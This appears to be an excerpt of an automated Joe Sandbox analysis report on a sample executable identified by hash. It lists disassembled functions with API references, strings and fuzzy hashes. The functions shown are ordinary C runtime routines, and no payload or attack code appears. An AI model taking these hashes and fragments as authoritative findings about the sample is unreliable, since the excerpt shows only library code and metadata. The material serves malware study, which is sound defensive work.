_free.LIBCMT ref: 6CC55936
_free.LIBCMT ref: 6CC5593E
_free.LIBCMT ref: 6CC55946
_free.LIBCMT ref: 6CC5594E
_free.LIBCMT ref: 6CC55956
_free.LIBCMT ref: 6CC5595D
_free.LIBCMT ref: 6CC55965
_free.LIBCMT ref: 6CC5596D
_free.LIBCMT ref: 6CC55975
_free.LIBCMT ref: 6CC5597D
_free.LIBCMT ref: 6CC55985
_free.LIBCMT ref: 6CC5598D
_free.LIBCMT ref: 6CC55995
_free.LIBCMT ref: 6CC5599D
_free.LIBCMT ref: 6CC559A5
_free.LIBCMT ref: 6CC559B0
_free.LIBCMT ref: 6CC559B8
_free.LIBCMT ref: 6CC559C0
_free.LIBCMT ref: 6CC559C8
_free.LIBCMT ref: 6CC559D0
_free.LIBCMT ref: 6CC559D8
_free.LIBCMT ref: 6CC559E0
_free.LIBCMT ref: 6CC559E8
_free.LIBCMT ref: 6CC559F0
_free.LIBCMT ref: 6CC559F8
_free.LIBCMT ref: 6CC55A00
_free.LIBCMT ref: 6CC55A08
_free.LIBCMT ref: 6CC55A10
_free.LIBCMT ref: 6CC55A18
_free.LIBCMT ref: 6CC55A20
_free.LIBCMT ref: 6CC55A28
_free.LIBCMT ref: 6CC55A36
_free.LIBCMT ref: 6CC55A41
_free.LIBCMT ref: 6CC55A4C
_free.LIBCMT ref: 6CC55A57
_free.LIBCMT ref: 6CC55A62
_free.LIBCMT ref: 6CC55A6D
_free.LIBCMT ref: 6CC55A78
_free.LIBCMT ref: 6CC55A83
_free.LIBCMT ref: 6CC55A8E
_free.LIBCMT ref: 6CC55A99
_free.LIBCMT ref: 6CC55AA4
_free.LIBCMT ref: 6CC55AAF
_free.LIBCMT ref: 6CC55ABA
_free.LIBCMT ref: 6CC55AC5
_free.LIBCMT ref: 6CC55AD0
_free.LIBCMT ref: 6CC55ADB
_free.LIBCMT ref: 6CC55AE9
_free.LIBCMT ref: 6CC55AF4
_free.LIBCMT ref: 6CC55AFF
_free.LIBCMT ref: 6CC55B0A
_free.LIBCMT ref: 6CC55B15
_free.LIBCMT ref: 6CC55B20
_free.LIBCMT ref: 6CC55B2B
_free.LIBCMT ref: 6CC55B36
_free.LIBCMT ref: 6CC55B41
_free.LIBCMT ref: 6CC55B4C
_free.LIBCMT ref: 6CC55B57
_free.LIBCMT ref: 6CC55B62
_free.LIBCMT ref: 6CC55B6D
_free.LIBCMT ref: 6CC55B78
_free.LIBCMT ref: 6CC55B83
_free.LIBCMT ref: 6CC55B8E
_free.LIBCMT ref: 6CC55B9C
_free.LIBCMT ref: 6CC55BA7
_free.LIBCMT ref: 6CC55BB2
_free.LIBCMT ref: 6CC55BBD
_free.LIBCMT ref: 6CC55BC8
_free.LIBCMT ref: 6CC55BD3
_free.LIBCMT ref: 6CC55BDE
_free.LIBCMT ref: 6CC55BE9
_free.LIBCMT ref: 6CC55BF4
_free.LIBCMT ref: 6CC55BFF
_free.LIBCMT ref: 6CC55C0A
_free.LIBCMT ref: 6CC55C15
_free.LIBCMT ref: 6CC55C20
_free.LIBCMT ref: 6CC55C2B
_free.LIBCMT ref: 6CC55C36
_free.LIBCMT ref: 6CC55C41
_free.LIBCMT ref: 6CC55C4F
_free.LIBCMT ref: 6CC55C5A
_free.LIBCMT ref: 6CC55C65
_free.LIBCMT ref: 6CC55C70
_free.LIBCMT ref: 6CC55C7B
_free.LIBCMT ref: 6CC55C86

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 93b5c46fd1915da171662feb3fb606db070fd1b12e43ed7bf017f46b63144f54
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: B6710731420B809BD7621B31DD01AD976A27F10364F98491C91D6ABFB0EF33E8799B5E

Function 6CC2C2AA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 6CC2C3C9
___TypeMatch.LIBVCRUNTIME ref: 6CC2C4D7
_UnwindNestedFrames.LIBCMT ref: 6CC2C629
CallUnexpected.LIBVCRUNTIME ref: 6CC2C644

Strings

csm, xrefs: 6CC2C400
csm, xrefs: 6CC2C2E7
csm, xrefs: 6CC2C354

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 622306345a70fe4033e6c473c831bed086c4eec718668825af87f3afcf6d5796
Instruction ID: fae105f8219c4512f864d7de6509629c71da2519df240098eb406f696fe40876
Opcode Fuzzy Hash: 622306345a70fe4033e6c473c831bed086c4eec718668825af87f3afcf6d5796
Instruction Fuzzy Hash: A8B19971C00209EFEF14EFA5C8809DEBBB5FF04318B14466AE815ABA01E739DA55DF91

Function 6CC2B350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CC2B387
___except_validate_context_record.LIBVCRUNTIME ref: 6CC2B38F
_ValidateLocalCookies.LIBCMT ref: 6CC2B418
__IsNonwritableInCurrentImage.LIBCMT ref: 6CC2B443
_ValidateLocalCookies.LIBCMT ref: 6CC2B498

Strings

csm, xrefs: 6CC2B42D

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f016170fdd4eb3f3ff6fdf1f9d0ee22677f0e37ca91318d205f1ae32ad839ed1
Instruction ID: 29471559468346c5b85509066f407d07b315d393fe9bce24a47a60b097cd2026
Opcode Fuzzy Hash: f016170fdd4eb3f3ff6fdf1f9d0ee22677f0e37ca91318d205f1ae32ad839ed1
Instruction Fuzzy Hash: E8419534E002199BCF00CF69C8A4ADEBBB5FF45328F148155E81A9BB51E739E955CB90

Function 6CC3021A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6CC30329,00000000,6CC2DB30,00000000,00000000,00000001,?,6CC304A2,00000022,FlsSetValue,6CC37898,6CC378A0,00000000), ref: 6CC302DB

Strings

api-ms-, xrefs: 6CC30271
ext-ms-, xrefs: 6CC30285

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cb960f4ff8a7c9fd611269e0d8a9668dd509f358a49c9b89214ed00bd93d7f83
Instruction ID: 3ebeaca6c4b5c82b87327e2665af826131d242dbac2c04ea84db2feba4679536
Opcode Fuzzy Hash: cb960f4ff8a7c9fd611269e0d8a9668dd509f358a49c9b89214ed00bd93d7f83
Instruction Fuzzy Hash: B5215773B01670ABCB229A76FC41B5A7778AB43364B252214EC1DE7680FB35E901C7D8

Function 6CC2B8FC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CC2B531,6CC2A650,6CC2A069,?,6CC2A2A1,?,00000001,?,?,00000001,?,6CC3B698,0000000C,6CC2A39A), ref: 6CC2B90A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CC2B918
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CC2B931
SetLastError.KERNEL32(00000000,6CC2A2A1,?,00000001,?,?,00000001,?,6CC3B698,0000000C,6CC2A39A,?,00000001,?), ref: 6CC2B983

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 37b67aac2426ccd48adf850f4d1dcd45c4d503e41894c38dd0693006437f8bde
Instruction ID: d80536375e7bbffa971400c1aa109687549f9145955045fb4f2df4702791f374
Opcode Fuzzy Hash: 37b67aac2426ccd48adf850f4d1dcd45c4d503e41894c38dd0693006437f8bde
Instruction Fuzzy Hash: 3401243330D7119EA7102A776DB9E6626B5FB0337CB20033DF022819E1FF199805A650

Function 6CC2F44E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, xrefs: 6CC2F46A

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
API String ID: 0-3341001940
Opcode ID: 5a15ee681f1ddaf485d9e944defd3a77f0d2ec54281fe008e06a577d212e91eb
Instruction ID: 3667e06c61e1bf6f0d2978d13bb1609f237ea75d645400d4dbb640c7fdfde8ed
Opcode Fuzzy Hash: 5a15ee681f1ddaf485d9e944defd3a77f0d2ec54281fe008e06a577d212e91eb
Instruction Fuzzy Hash: A221D43120422DAFCB10DF76988094B7BB9FF053287044A2DE81AD7E40FB78E8448BA0

Function 6CC54C33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CC54C3F

Part of subcall function 6CC53F1C: __getptd_noexit.LIBCMT ref: 6CC53F1F
Part of subcall function 6CC53F1C: __amsg_exit.LIBCMT ref: 6CC53F2C

__amsg_exit.LIBCMT ref: 6CC54C5F
__lock.LIBCMT ref: 6CC54C6F
_free.LIBCMT ref: 6CC54C9F

Strings

05B, xrefs: 6CC54C96

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3170801528-3788103304
Opcode ID: 508d1551824bbdc2ef469a57c1b2eac3769deb7d06712a4291803ba22c1775c0
Instruction ID: abb2121d5dd053c8befbc79228ea531e91640919da22194425da68b7a32b8b07
Opcode Fuzzy Hash: 508d1551824bbdc2ef469a57c1b2eac3769deb7d06712a4291803ba22c1775c0
Instruction Fuzzy Hash: 3F01ED32E02621ABD710DF66A40478D7B70BF85728FD48115E420A7B80EB28A5B5CBCD

Function 6CC2D45E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5BB4DFEB,00000000,?,00000000,6CC35D62,000000FF,?,6CC2D3F8,?,?,6CC2D3CC,?), ref: 6CC2D493
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC2D4A5
FreeLibrary.KERNEL32(00000000,?,00000000,6CC35D62,000000FF,?,6CC2D3F8,?,?,6CC2D3CC,?), ref: 6CC2D4C7

Strings

mscoree.dll, xrefs: 6CC2D48C
CorExitProcess, xrefs: 6CC2D49D

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 64096a4790860ea06be67fb82608e027a4708f99b2fdcc44836bb478100b045f
Instruction ID: a3c37db6868da89616b1ea543a4a804a1f1eb8f61e8ce876f6d46be8a528b436
Opcode Fuzzy Hash: 64096a4790860ea06be67fb82608e027a4708f99b2fdcc44836bb478100b045f
Instruction Fuzzy Hash: 6A01A271A10A29EFDF119F50DD09BAEBBB8FB05715F004525F825E2A80EB3C9900CB50

Function 6CC31ED5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CC31F5A
__alloca_probe_16.LIBCMT ref: 6CC32023
__freea.LIBCMT ref: 6CC3208A

Part of subcall function 6CC3107A: RtlAllocateHeap.NTDLL(00000000,6CC2F9C7,6CC30D94,?,6CC2F9C7,00000220,?,?,6CC30D94), ref: 6CC310AC

__freea.LIBCMT ref: 6CC3209D
__freea.LIBCMT ref: 6CC320AA

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 44f8210620bff62526f8bbf581392107282e5dd781041949c302ce389128e54b
Instruction ID: a3445d76f3df673f4d75eecde3134e38b23f72e9c8458c8938391a54cfafed91
Opcode Fuzzy Hash: 44f8210620bff62526f8bbf581392107282e5dd781041949c302ce389128e54b
Instruction Fuzzy Hash: F951E872601226AFEF104E65EC54EEF36A9EF84318B105129FD1CD6651F739CC09C6A0

Function 6CC54997 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6CC549A3

Part of subcall function 6CC53F1C: __getptd_noexit.LIBCMT ref: 6CC53F1F
Part of subcall function 6CC53F1C: __amsg_exit.LIBCMT ref: 6CC53F2C

__getptd.LIBCMT ref: 6CC549BA
__amsg_exit.LIBCMT ref: 6CC549C8
__lock.LIBCMT ref: 6CC549D8
__updatetlocinfoEx_nolock.LIBCMT ref: 6CC549EC

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2f98ad2ac27c5ac4b063f65c41e5d303a7e0890dda94c7d3bc12713a7fb7ef2c
Instruction ID: 31c6a67e8471d226a9af4e751fe3427d0eb88c23712c4bd5568772667551d391
Opcode Fuzzy Hash: 2f98ad2ac27c5ac4b063f65c41e5d303a7e0890dda94c7d3bc12713a7fb7ef2c
Instruction Fuzzy Hash: 08F0BB32A453509BD720DBB4940278D33A07F0072DFD44249E004A7BD0FB685975865D

Function 6CC2BED2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CC2BE83,00000000,?,00000001,?,?,?,6CC2BF72,00000001,FlsFree,6CC36F70,FlsFree), ref: 6CC2BEDF
GetLastError.KERNEL32(?,6CC2BE83,00000000,?,00000001,?,?,?,6CC2BF72,00000001,FlsFree,6CC36F70,FlsFree,00000000,?,6CC2B9D1), ref: 6CC2BEE9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CC2BF11

Strings

api-ms-, xrefs: 6CC2BEF6

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 54159f98b3ec5f247624744224cd6051eb389ed2c00977ff4320bbdefca6540f
Instruction ID: 5400b0a57c2c6ddf7b2f658a535a893f4f76ffb092e7eb1643bb41391730c89d
Opcode Fuzzy Hash: 54159f98b3ec5f247624744224cd6051eb389ed2c00977ff4320bbdefca6540f
Instruction Fuzzy Hash: 26E04874354604F7EF201A75EC06B493E75BB02748F108424F90EE48D1F76AD5129DD9

Function 6CC325E2 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(5BB4DFEB,00000000,00000000,?), ref: 6CC32645

Part of subcall function 6CC3001C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CC32080,?,00000000,-00000008), ref: 6CC3007D

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CC32897
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC328DD
GetLastError.KERNEL32 ref: 6CC32980

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 86a1b3c9a1340b745ba9ed1990de883db664f74e41d31d429814d88f27b0ff70
Instruction ID: e131f2cdcccec6ba7136fab67556b298b7bd5eb18b8c0216f06c2744f2f58838
Opcode Fuzzy Hash: 86a1b3c9a1340b745ba9ed1990de883db664f74e41d31d429814d88f27b0ff70
Instruction Fuzzy Hash: CBD17D75E012589FCF01CFA9E8949EDBBB4FF09314F28416AE459E7752E630E941CB90

Function 6CC2C053 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CC2C11A
___AdjustPointer.LIBCMT ref: 6CC2C13D
___AdjustPointer.LIBCMT ref: 6CC2C1D9

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0ad4211dff141d4fd6760d15d4a46e2cac6aacc6fb2e6fd7ef1084b0c7e411fa
Instruction ID: 1a01c8f73a69fc8dd6a43152622321188b4b844237b21ed0d4b74037f0a7a9f1
Opcode Fuzzy Hash: 0ad4211dff141d4fd6760d15d4a46e2cac6aacc6fb2e6fd7ef1084b0c7e411fa
Instruction Fuzzy Hash: 93512672605602AFFB15AF55D881BAAB7B4FF05308F20462DEC15C7A90F739E885CB90

Function 6CC2EC68 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6CC3001C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CC32080,?,00000000,-00000008), ref: 6CC3007D

GetLastError.KERNEL32 ref: 6CC2ECCC
__dosmaperr.LIBCMT ref: 6CC2ECD3
GetLastError.KERNEL32(?,?,?,?), ref: 6CC2ED0D
__dosmaperr.LIBCMT ref: 6CC2ED14

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: b60f9dd02df547466cf6a87d440a1c3237a1574237cc6208cb5c704a64a0fda7
Instruction ID: 104330055e07402a014581cbc3129d765d049e36d48bd3133401c8e1660a11cc
Opcode Fuzzy Hash: b60f9dd02df547466cf6a87d440a1c3237a1574237cc6208cb5c704a64a0fda7
Instruction Fuzzy Hash: 0F21957160461AAFDB109F76888095ABBB9FF05369704851DE819E7A40F738EC518BD0

Function 6CC33F56 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CC33716,00000000,00000001,00000000,?,?,6CC329D4,?,00000000,00000000), ref: 6CC33F6D
GetLastError.KERNEL32(?,6CC33716,00000000,00000001,00000000,?,?,6CC329D4,?,00000000,00000000,?,?,?,6CC32F77,00000000), ref: 6CC33F79

Part of subcall function 6CC33F3F: CloseHandle.KERNEL32(FFFFFFFE,6CC33F89,?,6CC33716,00000000,00000001,00000000,?,?,6CC329D4,?,00000000,00000000,?,?), ref: 6CC33F4F

___initconout.LIBCMT ref: 6CC33F89

Part of subcall function 6CC33F01: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC33F30,6CC33703,?,?,6CC329D4,?,00000000,00000000,?), ref: 6CC33F14

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CC33716,00000000,00000001,00000000,?,?,6CC329D4,?,00000000,00000000,?), ref: 6CC33F9E

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
